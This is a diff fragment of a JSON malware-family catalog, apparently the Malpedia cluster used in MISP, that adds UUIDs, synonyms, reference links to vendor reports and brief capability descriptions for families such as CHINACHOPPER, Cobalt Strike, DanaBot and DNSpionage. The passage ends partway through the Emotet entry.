"https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "96bcaa83-998b-4fb2-a4e7-a2d33c6427d7", + "value": "BioData" + }, { "description": "", "meta": { @@ -4091,6 +5018,20 @@ "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", "value": "Bitsran" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", + "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "265f96d1-fdd4-4dec-b7ca-51ae6f726634", + "value": "Bitter RAT" + }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { @@ -4106,6 +5047,22 @@ "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", "value": "BKA Trojaner" }, + { + "description": "a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://attack.mitre.org/software/S0069/", + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff660bf2-a9e4-4973-be0c-9f6618e40899", + "value": "BLACKCOFFEE" + }, { "description": "", "meta": { @@ -4113,6 +5070,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://marcusedmondson.com/2019/01/18/black-energy-analysis/", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" ], "synonyms": [], @@ -4151,6 +5109,22 @@ "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", "value": "BlackRevolution" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter", + "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/" + ], + "synonyms": [ + "BLACKHEART" + ], + "type": [] + }, + "uuid": "0b235fbf-c191-47c0-ae83-9386a64b1c79", + "value": "BlackRouter" + }, { "description": "", "meta": { @@ -4226,7 +5200,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe" ], "synonyms": [], "type": [] @@ -4234,6 +5209,19 @@ "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", "value": "Bozok" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brain", + "https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1619ee64-fc54-47c0-8ee1-8b786fefc0fd", + "value": "BRAIN" + }, { "description": "", "meta": { @@ -4263,7 +5251,20 @@ "value": "BravoNC" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "52cf2986-89e8-463d-90b6-e4356c9777e7", + "value": "BreachRAT" + }, + { + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" @@ -4288,6 +5289,19 @@ "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", "value": "Bredolab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader", + "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc", + "value": "BrushaLoader" + }, { "description": "", "meta": { @@ -4328,6 +5342,20 @@ "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", "value": "BTCWare" }, + { + "description": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://attack.mitre.org/software/S0043/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d114ee6c-cf7d-408a-8077-d59e736f5a66", + "value": "BUBBLEWRAP" + }, { "description": "", "meta": { @@ -4345,10 +5373,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", - "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", + "https://malware-research.org/carbanak-source-code-leaked/", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", + "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", - "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" + "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/" ], "synonyms": [ "Ratopak" @@ -4381,8 +5411,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", + "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/", "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", "http://malware-traffic-analysis.net/2017/05/09/index.html", + "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" ], @@ -4505,6 +5537,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon", + "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html", "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" ], "synonyms": [], @@ -4518,6 +5551,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" @@ -4547,7 +5581,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], "type": [] @@ -4555,6 +5590,19 @@ "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", "value": "Cardinal RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat", + "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4ad06a5f-12e6-44ae-9547-98ee62114357", + "value": "CarrotBat" + }, { "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { @@ -4714,6 +5762,22 @@ "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", "value": "ChewBacca" }, + { + "description": "a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", + "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", + "https://attack.mitre.org/software/S0020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0d8f0bb7-e14f-4b85-baa1-6ec951aa6c53", + "value": "CHINACHOPPER" + }, { "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { @@ -4829,18 +5893,36 @@ "value": "CMSTAR" }, { - "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot", + "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7acd9a27-f550-4c47-9fc8-429b61b04217", + "value": "CoalaBot" + }, + { + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", + "https://blog.cobaltstrike.com/", + "https://www.cobaltstrike.com/support", "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://401trg.com/burning-umbrella/ ", + "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html" + "http://cyberforensicator.com/2018/12/23/dissecting-cozy-bears-malicious-lnk-file/" ], "synonyms": [], "type": [] @@ -5061,11 +6143,13 @@ "https://www.honeynet.org/files/KYE-Conficker.pdf", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", + "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://github.com/tillmannw/cnfckr", "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ + "Kido", "downadup", "traffic converter" ], @@ -5129,6 +6213,19 @@ "uuid": "495377c4-1be5-4c65-ba66-94c221061415", "value": "Corebot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn", + "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "331f0c80-a795-48aa-902e-0b0d57de85f5", + "value": "CoreDN" + }, { "description": "", "meta": { @@ -5166,6 +6263,7 @@ "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", + "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" ], "synonyms": [ @@ -5177,6 +6275,19 @@ "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", "value": "CrashOverride" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9d193a65-dc18-4832-9daa-aab245cd1c86", + "value": "CREAMSICLE" + }, { "description": "", "meta": { @@ -5207,13 +6318,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://s.tencent.com/research/report/669.html", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], - "synonyms": [], + "synonyms": [ + "SEEDOOR" + ], "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", - "value": "Crimson" + "value": "Crimson RAT" }, { "description": "", @@ -5235,11 +6350,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", - "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://hackmag.com/security/ransomware-russian-style/", - "https://twitter.com/demonslay335/status/971164798376468481", - "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx" + "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", + "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://twitter.com/demonslay335/status/971164798376468481" ], "synonyms": [], "type": [] @@ -5558,15 +6674,21 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", - "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" + "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", + "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", + "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", + "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", + "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/" ], "synonyms": [], "type": [] @@ -5579,10 +6701,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", - "https://darkcomet.net", - "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", + "https://darkcomet.net", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/" ], "synonyms": [ "Fynloski", @@ -5818,7 +6942,7 @@ "value": "DeriaLock" }, { - "description": "", + "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", @@ -5826,7 +6950,9 @@ "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" ], - "synonyms": [], + "synonyms": [ + "PHOTO" + ], "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", @@ -5930,6 +7056,19 @@ "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs", + "https://twitter.com/cyb3rops/status/1101138784933085191" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3bbf08fd-f147-4b23-9d48-a53ac836bc05", + "value": "DispenserXFS" + }, { "description": "", "meta": { @@ -5940,7 +7079,9 @@ "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/" ], "synonyms": [], "type": [] @@ -5963,6 +7104,19 @@ "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", "value": "DMA Locker" }, + { + "description": "DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff", + "https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", + "value": "DMSniff" + }, { "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { @@ -5972,7 +7126,9 @@ "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html" ], - "synonyms": [], + "synonyms": [ + "TEXTMATE" + ], "type": [] }, "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", @@ -5983,9 +7139,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", - "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" + "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/", + "https://www.us-cert.gov/ncas/alerts/AA19-024A", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", + "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" + ], + "synonyms": [ + "Agent Drable", + "Webmask" ], - "synonyms": [], "type": [] }, "uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438", @@ -6123,6 +7288,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", @@ -6139,6 +7305,24 @@ "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", "value": "Dridex" }, + { + "description": "Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", + "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/" + ], + "synonyms": [ + "Spy.Agent.ORM", + "Toshliph" + ], + "type": [] + }, + "uuid": "76f6f047-1362-4651-bd2f-9ca10c119e8d", + "value": "DRIFTPIN" + }, { "description": "", "meta": { @@ -6253,7 +7437,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", - "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates" + "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Dyreza" @@ -6289,6 +7474,20 @@ "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", "value": "EHDevel" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf", + "https://www.clearskysec.com/iec/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "31b18d64-815c-4464-8fcc-f084953a75f5", + "value": "ElectricPowder" + }, { "description": "", "meta": { @@ -6318,6 +7517,23 @@ "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", "value": "Elise" }, + { + "description": "ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer", + "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://attack.mitre.org/software/S0064" + ], + "synonyms": [ + "Elmost" + ], + "type": [] + }, + "uuid": "e0a8bb01-f0c8-4e2c-bd1e-4c84135ba834", + "value": "ELMER" + }, { "description": "", "meta": { @@ -6334,6 +7550,54 @@ "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", "value": "Emdivi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", + "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", + "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://github.com/d00rt/emotet_research", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", + 